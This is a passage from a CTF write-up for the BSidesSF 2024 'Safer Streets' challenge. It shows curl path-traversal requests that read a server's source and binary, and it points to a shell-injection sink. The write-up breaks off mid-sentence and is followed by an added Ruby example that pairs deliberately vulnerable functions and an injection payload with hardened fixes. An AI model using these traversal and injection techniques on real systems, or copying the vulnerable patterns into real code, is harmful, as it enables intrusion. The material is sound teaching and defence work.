One Article Review

Source SkullSecurity (blog)
Identifier 8494289
Publication date 2024-05-05 00:00:00 (seen: 2024-05-06 00:05:44)
Title BSidesSF 2024 Writeups: Safer Streets (Web / reversing)
Text

This is a write-up for Safer Streets. I apparently wrote this in more "note to self" style, not blog style, so enjoy!

First, browse the application. You should be able to create an error:

    $ curl 'http://localhost:8080/display?name=test'
    Error in script /app/server.rb: No such file or directory @ rb_sysopen - /app/data/test

Note that the response has an image/jpeg content-type, so it might confuse the browser. That error grants two primitives:

a) Read any file via path traversal (the name parameter is appended to /app/data/ with no containment check)
b) The full path to the server script, which tells you exactly where to point the traversal

For example:

    $ curl -s 'http://localhost:8080/display?name=../server.rb' | head -n20
    require 'json'
    require 'sinatra'
    require 'pp'
    require 'singlogger'
    require 'open3'

    ::SingLogger.set_level_from_string(level: ENV['log_level'] || 'debug')
    LOGGER = ::SingLogger.instance()

    # Ideally, we set all these in the Dockerfile
    set :bind, ENV['HOST'] || '0.0.0.0'
    set :port, ENV['PORT'] || '8080'

    SAFER_STREETS_PATH = ENV['SAFER_STREETS'] || '/app/safer-streets'
    SCRIPT = File.expand_path(__FILE__)

    LOGGER.info("Checking for required binaries...")
    if File.exist?(SAFER_STREETS_PATH)
      LOGGER.info("* Found `safer-streets` binary: #{ SAFER_STREETS_PATH }")
    [...]

You can grab the safer-streets binary as well:

    $ curl -s 'http://localhost:8080/display?name=../../../app/safer-streets' | file -
    /dev/stdin: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=fa512a55e0fbc8c4ad80483379826183f29ce161, for GNU/Linux 3.2.0, with debug_info, not stripped

Inspecting the Ruby code shows a shell-injection issue if you control the output of safer-streets, because the command is built as a single string that goes through /bin/sh:

    system("/usr/bin/report-infraction --node='#{result['node']}' --img='#{photo}'")

You can reverse or mess with the binary to dis
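The two server-side bugs above (the unchecked name parameter behind /display, and the single-string system() call) are easy to reproduce and to fix, so here is an added example that is not from the SkullSecurity writeup nor from the CTF's own server.rb. It shows each vulnerable pattern next to a hardened form. The /app/data directory comes from the writeup's error message; /bin/echo stands in for /usr/bin/report-infraction, and the injection payload and filenames are constructed for the demonstration (all assumptions).

```ruby
# Added example, not the CTF's server.rb: path-traversal and shell-injection
# patterns from the Safer Streets writeup, each beside a hardened version.
# Assumptions: DATA_DIR as in the writeup's error message; REPORT_CMD is a
# stand-in (/bin/echo) for /usr/bin/report-infraction; payloads are constructed.
require 'open3'
require 'shellwords'

DATA_DIR   = '/app/data'   # from the error "rb_sysopen - /app/data/test"
REPORT_CMD = '/bin/echo'   # assumption: stand-in for /usr/bin/report-infraction

# --- 1. path traversal ------------------------------------------------------

# Vulnerable: what the error message implies the server does, plain
# concatenation, so "../server.rb" resolves outside DATA_DIR.
def unsafe_data_path(name)
  File.join(DATA_DIR, name)
end

# Hardened: canonicalise the path, then require it to stay under base.
# Returns nil (the caller should answer 404) for anything that escapes.
def safe_data_path(name, base = DATA_DIR)
  return nil if name.nil? || name.empty?
  return nil if name.start_with?('~')          # expand_path would expand ~user
  full = File.expand_path(name, base)          # collapses "." and ".."
  # expand_path does not follow symlinks; for existing files also compare
  # File.realpath(full) against File.realpath(base).
  full.start_with?(base + File::SEPARATOR) ? full : nil
end

# --- 2. shell injection -----------------------------------------------------

# Vulnerable: a single string is handed to /bin/sh, so a quote inside
# node or photo ends the argument and starts a new command.
def report_via_string(node, photo)
  out, _status = Open3.capture2("#{REPORT_CMD} --node='#{node}' --img='#{photo}'")
  out
end

# Hardened (a): argv form, the command is exec'd directly, no shell at all.
def report_via_argv(node, photo)
  out, _status = Open3.capture2(REPORT_CMD, "--node=#{node}", "--img=#{photo}")
  out
end

# Hardened (b): if one command string is unavoidable, escape every word.
def report_command_escaped(node, photo)
  "#{REPORT_CMD} --node=#{Shellwords.escape(node)} --img=#{Shellwords.escape(photo)}"
end

if __FILE__ == $PROGRAM_NAME
  ['test', '../server.rb', '../../../app/safer-streets'].each do |n|
    puts "#{n.ljust(28)} unsafe=#{unsafe_data_path(n)}  safe=#{safe_data_path(n).inspect}"
  end
  # Constructed payload: closes the quote, runs a command, comments out the rest.
  payload = "'; echo INJECTED #"
  puts "string form:\n#{report_via_string(payload, 'x.jpg')}"
  puts "argv form:\n#{report_via_argv(payload, 'x.jpg')}"
  puts "escaped:    #{report_command_escaped(payload, 'x.jpg')}"
end
```

Run it directly to see the difference: in the string form the payload produces a separate INJECTED line because the injected echo actually executed, while the argv form prints the payload back as an inert argument. The same applies to system(): pass an array of arguments, never an interpolated string.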
Tags Threat

